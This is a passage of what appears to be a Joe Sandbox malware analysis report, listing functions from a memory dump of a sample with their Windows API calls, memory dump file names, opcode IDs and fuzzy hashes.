                                          • Instruction Fuzzy Hash: CCF0A7708183089FD7929B24DC457D57BBC9701308F0001EABA4C96293DB710BC8CF51
                                          Function 0012C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LoadString$__swprintf
                                          • String ID:
                                          • API String ID: 207118244-0
                                          • Opcode ID: cf248a4a1e7c900a3ffbbca8963d15863073dadc1bbbb9f5a798c7cfc4a5b755
                                          • Instruction ID: 5aff8c28c3406cb975e794b7b25267cfb15c11714799fddd6fb5b3c6b2b44603
                                          • Opcode Fuzzy Hash: cf248a4a1e7c900a3ffbbca8963d15863073dadc1bbbb9f5a798c7cfc4a5b755
                                          • Instruction Fuzzy Hash: C9B13D35A0011ADFCB14EF94D891DEEB7B5FF58710F20811AFA15A7392EB70AA51CB90
                                          Function 000BA820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                          • Instruction ID: 417df4bf78b998b0d23288de8f472549d19ef9558a1939c79d149693954ce8e3
                                          • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                          • Instruction Fuzzy Hash: 6961CD70600206DFDB20DF54C881AFEB7E9EF46310F15806DE9169B692EB74ED80DB62
                                          Function 000BD679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 02d8df17a40881af29320a984bf38a52e7dac98496d1287216228e869efdd63a
                                          • Instruction ID: 6485bdb9fcad258061fdb845abc2b1d23f6039f725ad3f5aed967948d52728c5
                                          • Opcode Fuzzy Hash: 02d8df17a40881af29320a984bf38a52e7dac98496d1287216228e869efdd63a
                                          • Instruction Fuzzy Hash: F7516E35604604ABCB14EB64C991FFEB7A6AF45310F148169F946AB393DF30EE01DB91
                                          Function 000C343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                          • Instruction ID: e4c8984463a8a077af6886366238e1b950987fb21e46f1cfae95b8f5f22626ba
                                          • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                          • Instruction Fuzzy Hash: 84317079614A029FC729DF18D450F6AF7E4FF08350B14C56EE98A8B7A1DB30E981CB94
                                          Function 000C410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 000C41B2
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 42052d750f04b070d743697037e0f3c0d22d19c129ee7d326f4a94cb19eeb371
                                          • Instruction ID: 5f2248c4f9b14f7a5b7fe93d8c50a3e5870b5152b211d6562253d7b8f6180c3d
                                          • Opcode Fuzzy Hash: 42052d750f04b070d743697037e0f3c0d22d19c129ee7d326f4a94cb19eeb371
                                          • Instruction Fuzzy Hash: EA313E71A00615AFCB18DF6DC8A4B9DB7B5BF58310F188619EC5593710D770B9908B90
                                          Function 000EE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 5c7186bb262987d1b75686baba83a8ef6518d5280a102d8fac6d285edfe8a9c8
                                          • Instruction ID: a89e551f3b39d1e1a74c6b64f9ea21b7cac0b9f38fcf26a339f5d9b39fbc9cc3
                                          • Opcode Fuzzy Hash: 5c7186bb262987d1b75686baba83a8ef6518d5280a102d8fac6d285edfe8a9c8
                                          • Instruction Fuzzy Hash: 7F411974508341DFDB64DF15C488B5ABBE1BF45308F0988ACE88A9B362C776EC85CB52
                                          Function 000C49C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C4B29: FreeLibrary.KERNEL32(00000000,?), ref: 000C4B63
                                            • Part of subcall function 000D547B: __wfsopen.LIBCMT ref: 000D5486
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000C27AF,?,00000001), ref: 000C49F4
                                            • Part of subcall function 000C4ADE: FreeLibrary.KERNEL32(00000000), ref: 000C4B18
                                            • Part of subcall function 000C48B0: _memmove.LIBCMT ref: 000C48FA
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          • Opcode ID: 4b572a8dfd14f477ddba49f82bc5cb61fcf2b72458651f84a589a5d8ecd7645b
                                          • Instruction ID: 8f97d5209b5f8c499c7f4bad0a1908167c1eb13ed876c94ea5a37f8ab3407fb5
                                          • Opcode Fuzzy Hash: 4b572a8dfd14f477ddba49f82bc5cb61fcf2b72458651f84a589a5d8ecd7645b
                                          • Instruction Fuzzy Hash: 5811E731A50205ABCB25FB70CC26FEE77A9AF44701F10842EF545A61D2EFB09E10A7A5
                                          Function 000EE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 5277e1c82ca159795c7228feb536c38e7098dcbad8e179c2125297abd124d688
                                          • Instruction ID: 34fcb11cbe39106c2c85046c59a04d6f08ca809f6738e0d2b705bc4566d451d7
                                          • Opcode Fuzzy Hash: 5277e1c82ca159795c7228feb536c38e7098dcbad8e179c2125297abd124d688
                                          • Instruction Fuzzy Hash: FA2125B4508341DFDB64DF54C444B9ABBE1BF88304F09496CF98A57322C736E849CBA2
                                          Function 000C4220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,000C3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 000C4276
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: bd36fe36ab4d8feb45ba0f6045600b18629cff826ff076e466a11f0ab7d667d1
                                          • Instruction ID: f139026569baffbaf1cdb07a8bff35510ed30dfd98b6f6d046ddfab41ff4b180
                                          • Opcode Fuzzy Hash: bd36fe36ab4d8feb45ba0f6045600b18629cff826ff076e466a11f0ab7d667d1
                                          • Instruction Fuzzy Hash: 7E112531200B019FD370CF55C891F6AB7E9FF88720F54892EE9AA86A50D7B0E8458B60
                                          Function 000C1A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                          • Instruction ID: 988964129b73e9c89d91a844eef79523562130e1cedecef757b36c87523b81d5
                                          • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                          • Instruction Fuzzy Hash: E301D6722017016ED3245B39D802FABBB98DF457A0F10852EF51ACA2D2EA71E4408BA4
                                          Function 0012495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00124998
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: EnvironmentVariable
                                          • String ID:
                                          • API String ID: 1431749950-0
                                          • Opcode ID: e2d8a617e1c9b81a81403b632cc0f3b029fc9c16a7ecd559d1541e34a9737975
                                          • Instruction ID: 03b9783c6089910664937f6c8af419304ea6bf60b50b81c0e356a2b9c8f48323
                                          • Opcode Fuzzy Hash: e2d8a617e1c9b81a81403b632cc0f3b029fc9c16a7ecd559d1541e34a9737975
                                          • Instruction Fuzzy Hash: 89F01D35608204AF9B14FB65D846DDF7BB8EF49320B00405AF9099B3A2DE70A9818B61
                                          Function 00117C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
                                            • Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031
                                          • _memset.LIBCMT ref: 00117CB4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw_memsetstd::exception::exception
                                          • String ID:
                                          • API String ID: 525207782-0
                                          • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                          • Instruction ID: 364800cab0e4a64f10b0daa454f6d972303b0449643cb0f011d018b71caa58e1
                                          • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                          • Instruction Fuzzy Hash: F501E4742042019FD325EF5CD541F89BBE1AF59310F24846AF5888B3A2DB72A840CBA1
                                          Function 000C4A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _fseek
                                          • String ID:
                                          • API String ID: 2937370855-0
                                          • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                          • Instruction ID: bf02c0021b7c50d78a6608fc27eaef089cfa4156be0b4dcd66416473b15f8dae
                                          • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                          • Instruction Fuzzy Hash: B1F085B6400208BFDF118F84DC00DEFBB79EB89724F04419CF9045A211D272EA21DBB1
                                          Function 000C4A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,?,000C27AF,?,00000001), ref: 000C4A63
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 9adf7dd1832b3c0e9e335d3feb9a5e0104aec1f377a4400dc564c263fba1fb2b
                                          • Instruction ID: fc378f20cc3e92a9368f5092ecf35b7c319038bdb4094c231f5648ba12684594
                                          • Opcode Fuzzy Hash: 9adf7dd1832b3c0e9e335d3feb9a5e0104aec1f377a4400dc564c263fba1fb2b
                                          • Instruction Fuzzy Hash: 00F08571140B01CFCB748F64E8A0E2ABBF0BF08326320A92EE5E683620C3719980CF05
                                          Function 000C4AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID:
                                          • API String ID: 2638373210-0
                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                          • Instruction ID: 6459a5e4f65d2ab3abd49951928c80401412b0de1dec10bddab3d2d1469624db
                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                          • Instruction Fuzzy Hash: A7F0587240020DFFDF05CF80C941EAEBB79FB08314F208189FC188A252D732DA21ABA1
                                          Function 000D09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000D09E4
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          • Opcode ID: 069a6aefe91cb0682260eb94b5ee8ea740c828eb52dd599ce041eb7612296746
                                          • Instruction ID: 06b1527ba1eb63cdae9407c97bc6de9b838ac87519012693bdc313e61e1f26e4
                                          • Opcode Fuzzy Hash: 069a6aefe91cb0682260eb94b5ee8ea740c828eb52dd599ce041eb7612296746
                                          • Instruction Fuzzy Hash: 42E086369041285BC72196999C05FEE77DDEB8A6A1F0402B6FD08D7255D9709C8186D1
                                          Function 00114D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00114D31
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FolderPath_memmove
                                          • String ID:
                                          • API String ID: 3334745507-0
                                          • Opcode ID: a8db73b72b465953e1e1a527cac4fd83e542a9dd8713b80bf217deb2a50280d9
                                          • Instruction ID: 69833f930bf3d2d21c7142f12c1be376d1da78430247ad16c95b98cd935192c2
                                          • Opcode Fuzzy Hash: a8db73b72b465953e1e1a527cac4fd83e542a9dd8713b80bf217deb2a50280d9
                                          • Instruction Fuzzy Hash: 61D05EB590032C2BDB60E6A59C0DDFB7BACD745220F0006A57D5CC3112ED349D8586E0
                                          Function 0011394D Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0011384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00113959,00000000,00000000,?,001005DB,00168070,00000002,?,?), ref: 001138CA
                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,001005DB,00168070,00000002,?,?,?,00000000), ref: 00113967
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: File$PointerWrite
                                          • String ID:
                                          • API String ID: 539440098-0
                                          • Opcode ID: 5b316713d0ccc8f42d42a13fb076885dfc97c4970396f5fd501cfe1da55da612
                                          • Instruction ID: 1a4470f59715b3729958ad8d50df97fa5ab3b7ff91021caf4efa45718452973b
                                          • Opcode Fuzzy Hash: 5b316713d0ccc8f42d42a13fb076885dfc97c4970396f5fd501cfe1da55da612
                                          • Instruction Fuzzy Hash: 3CE04F35410208BBDB20AF94D801BDAB7BCEF05710F00465AFD4091511D7B2AE549B90
                                          Function 00113EF7 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00113E7D,?,?,?), ref: 00113F0D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
